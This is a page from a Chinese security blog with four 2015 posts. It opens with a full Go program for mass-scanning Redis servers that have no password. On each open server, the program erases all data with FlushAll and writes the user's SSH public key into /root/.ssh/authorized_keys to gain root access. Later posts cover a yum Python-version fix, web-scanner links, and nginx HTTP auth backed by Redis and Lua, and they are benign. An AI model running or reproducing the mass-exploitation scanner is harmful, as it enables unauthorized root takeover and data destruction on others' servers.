0

3235

redis批量弱口令扫描及get root的poc[go语言版]

netxfly   发表于   2015 年 11 月 21 日

前些时间通过redis的弱口令拿服务器root权限的漏洞火了,一直没时间关注,今天下午难得有时间就出个批量利用的poc,效果如下图。 **请勿有于非法用途,just for fun** 知乎专栏链接:[http://zhuanlan.zhihu.com/netxfly/20358468](http://zhuanlan.zhihu.com/netxfly/20358468) ![](/static/upload/2015112105144910.png ) 依赖包安装: ```go get gopkg.in/redis.v3``` const rsa_key常量为你的cat ~/.ssh/id_rsa.pub的内容,生成方式如下: ![](/static/upload/2015112105145910.png) 完整代码: ``` package main import ( "bufio" "bytes" "fmt" "gopkg.in/redis.v3" "log" "os" "runtime" "strings" "time" ) const rsa_key = "\n\ncat ~/.ssh/id_rsa.pub的内容,自己用ssh-keygen -t rsa生成下即可\n\n" // HostInfo struct type HostInfo struct { host string port string reply string is_vul bool } // help function func Usage(cmd string) { fmt.Println(strings.Repeat("-", 50)) fmt.Println("Redis weak password poc by netxfly, x@xsec.io") fmt.Println("Usage:") fmt.Printf("%s iplist \n", cmd) fmt.Println(strings.Repeat("-", 50)) } // main function func main() { runtime.GOMAXPROCS(runtime.NumCPU()) if len(os.Args) != 2 { Usage(os.Args[0]) } else { Usage(os.Args[0]) iplist := os.Args[1] Scan(Prepare(iplist)) } } // read line from file and Scan func Prepare(iplist string) (slice_iplist []string) { iplistFile, _ := os.Open(iplist) defer iplistFile.Close() scanner := bufio.NewScanner(iplistFile) scanner.Split(bufio.ScanLines) for scanner.Scan() { slice_iplist = append(slice_iplist, scanner.Text()) } return slice_iplist } //Test connect function func TestConnect(host_info HostInfo, chan_result chan HostInfo) { host := host_info.host port := host_info.port reply := host_info.reply is_vul := false var buf bytes.Buffer logger := log.New(&buf, "logger: ", log.Ldate) client := redis.NewClient(&redis.Options{ Addr: host + ":" + port, Password: "", // no password set DB: 0, // use default DB }) _, err := client.Ping().Result() if err == nil { is_vul = true logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String()) logger.Println(client.Save().String()) logger.Println(client.FlushAll().String()) client.Set("xsec", rsa_key, 0) logger.Println(client.ConfigSet("dir", "/root/.ssh/").String()) logger.Println(client.ConfigGet("dir").String()) reply = client.ConfigSet("dbfilename", "authorized_keys").String() logger.Println(reply) logger.Println(client.Save().String()) fmt.Println(&buf) } host_info.is_vul = is_vul host_info.reply = reply chan_result <- host_info } // Scan function func Scan(slice_iplist []string) { n := len(slice_iplist) chan_scan_result := make(chan HostInfo, n) done := make(chan bool, n) for _, host_port := range slice_iplist { // fmt.Printf("Try to connect %s\n", host_port) t := strings.Split(host_port, ":") host := t[0] port := t[1] host_info := HostInfo{host, port, "", false} go TestConnect(host_info, chan_scan_result) for runtime.NumGoroutine() > runtime.NumCPU()*200 { time.Sleep(10 * time.Microsecond) } } go func() { for i := 0; i < cap(chan_scan_result); i++ { select { case r := <-chan_scan_result: if r.is_vul { fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply) } case <-time.After(60 * time.Second): fmt.Println("timeout") break } done <- true } }() for i := 0; i < cap(done); i++ { <-done } } ```

标签:redis弱口令利用poc 继续阅读

0

3330

基于代理的Web扫描器的简单实现

netxfly   发表于   2015 年 07 月 05 日

1. [基于代理的Web扫描器的简单实现](http://docs.xsec.io/proxy_scanner/),[知乎专栏](http://zhuanlan.zhihu.com/netxfly/20099454) 1. [基于VPN和透明代理的web扫描器的实现](http://docs.xsec.io/Transparent-Proxy-Scanner/),[知乎专栏](http://zhuanlan.zhihu.com/netxfly/20114329)

标签:基于代理的Web扫描器 继续阅读

0

2765

No module named yum解决

netxfly   发表于   2015 年 06 月 19 日

在机器中分别装了2个比系统默认版本高的python后,再次使用yum的时候发现报错了,如下: ```shell [root@localhost ~]# yum There was a problem importing one of the Python modules required to run yum. The error leading to this problem was: No module named yum Please install a package which provides this module, or verify that the module is installed correctly. It's possible that the above module doesn't match the current version of Python, which is: 2.6.8 (unknown, Jun 18 2015, 16:07:56) [GCC 4.4.7 20120313 (Red Hat 4.4.7-4)] If you cannot solve this problem yourself, please go to the yum faq at: http://yum.baseurl.org/wiki/Faq ``` yum是用python实现的,应该是默认执行时用了不匹配的版本,将yum中的python版本改到能import yum模块的即可。 - 查看系统中有哪些python ``` [root@localhost ~]# whereis python python: /usr/bin/python2.6-config /usr/bin/python /usr/bin/python2.6 /usr/lib/python2.6 /usr/lib64/python2.6 /usr/local/bin/python2.6-config /usr/local/bin/python /usr/local/bin/python2.7-config /usr/local/bin/python2.7 /usr/local/bin/python2.6 /usr/local/lib/python2.7 /usr/local/lib/python2.6 /usr/include/python2.6 /usr/share/man/man1/python.1.gz ``` - 先测试2.6的 ``` [root@localhost ~]# /usr/bin/python2.6 Python 2.6.6 (r266:84292, Nov 22 2013, 12:16:22) [GCC 4.4.7 20120313 (Red Hat 4.4.7-4)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import yum >>> exit() ``` 再测试默认2.7.10的 ``` [root@localhost ~]# python Python 2.7.10 (default, Jun 18 2015, 15:51:08) [GCC 4.4.7 20120313 (Red Hat 4.4.7-4)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import yum Traceback (most recent call last): File "", line 1, in ImportError: No module named yum >>> exit() ``` - 修改yum的默认python版本 ``` [root@localhost ~]# vim /usr/bin/yum #!/usr/bin/python2.6 ```

标签:linux 继续阅读

1

4588

利用lua + redis实现nginx的http auth认证

netxfly   发表于   2015 年 05 月 10 日

# nginx基于redis实现http auth 本文是昨天的文章([nginx登陆认证的几种方案](http://www.xsec.io/article/60/nginx-auth.html))的中的第3个方案,用nginx + lua + redis实现http auth方案。 # Radius API接口的实现 把方案2中的mongodb换成了redis,将密码过期的事交给了redis处理 ``` # Auth class # ---------------------------------------------------------------------------- class Auth2(tornado.web.RequestHandler): def initialize(self): self.radius_auth = None self.redis_client = None def get(self): self.render("auth2.html") def post(self): self.redis_client = redis.StrictRedis( host=CONST_REDIS.get('host'), port=CONST_REDIS.get('port'), db=CONST_REDIS.get('db'), password=CONST_REDIS.get('password') ) self.radius_auth = RadiusAuth(CONST_RADIUS) username = self.get_argument("username", "") or "" password = self.get_argument("password", "") or "" now = datetime.datetime.now() # print username.encode('utf-8'), password.encode('utf-8'), type(username.encode('utf-8')), type(password) ret_auth = self.radius_auth.auth(username.encode('utf-8'), password.encode('utf-8')) # print ret_auth expire = CONST_TIMEOUT * 60 if ret_auth: gen_secret = GenSecuret(username, password) secret = gen_secret.get_secret() values = dict( username=username, password=secret, time=now ) # insert to redis and set key expire self.redis_client.hmset(username, values) self.redis_client.expire(username, expire) # return value to client ret = dict( username=username, password=secret, status=True, expire=expire ) self.write(json.dumps(ret)) else: ret = dict( username=username, password="", status=False, expire=expire ) self.write(json.dumps(ret)) ``` # nginx 利用redis实现http auth ``` local p = "/usr/local/openresty/lualib" local m_package_path = package.path package.path = string.format("%s?.lua;%s?/init.lua;%s", p, p, m_package_path) -- http base auth function auth() local username = ngx.var.remote_user local password = ngx.var.remote_passwd -- if auth_monogodb(username, password) then -- return -- end if auth_redis(username, password) then return end ngx.header.www_authenticate = [[Basic realm="sinasec auth"]] ngx.exit(401) end -- auth by redis function auth_redis(username, password) local redis_info = { host="127.0.0.1", port=6379, db=0, password="mypass" } local redis = require "resty.redis" local red = redis:new() red:set_timeout(3000) -- 3 sec local ok, err = red:connect(redis_info["host"], redis_info["port"]) if not ok then ngx.log("failed to connect: ", err) return false end local res, err = red:auth(redis_info["password"]) if not res then ngx.log("failed to authenticate: ", err) return false end local res, err = red:hmget(username, "username", "password") -- for k, v in ipairs(res) do -- ngx.say(k) -- ngx.say(v) -- end if res and res ~= ngx.null then local user = res[1] or "" local pass = res[2] or "" -- ngx.say("username: " .. user .. " , password: " .. pass) if user ~="" and pass ~= "" and username == user and password == pass then -- ngx.log("username: " .. user .. " , password: " .. pass) return true end else return false end end -- call auth function auth() ```

标签:nginx redis lua 继续阅读

较旧的文章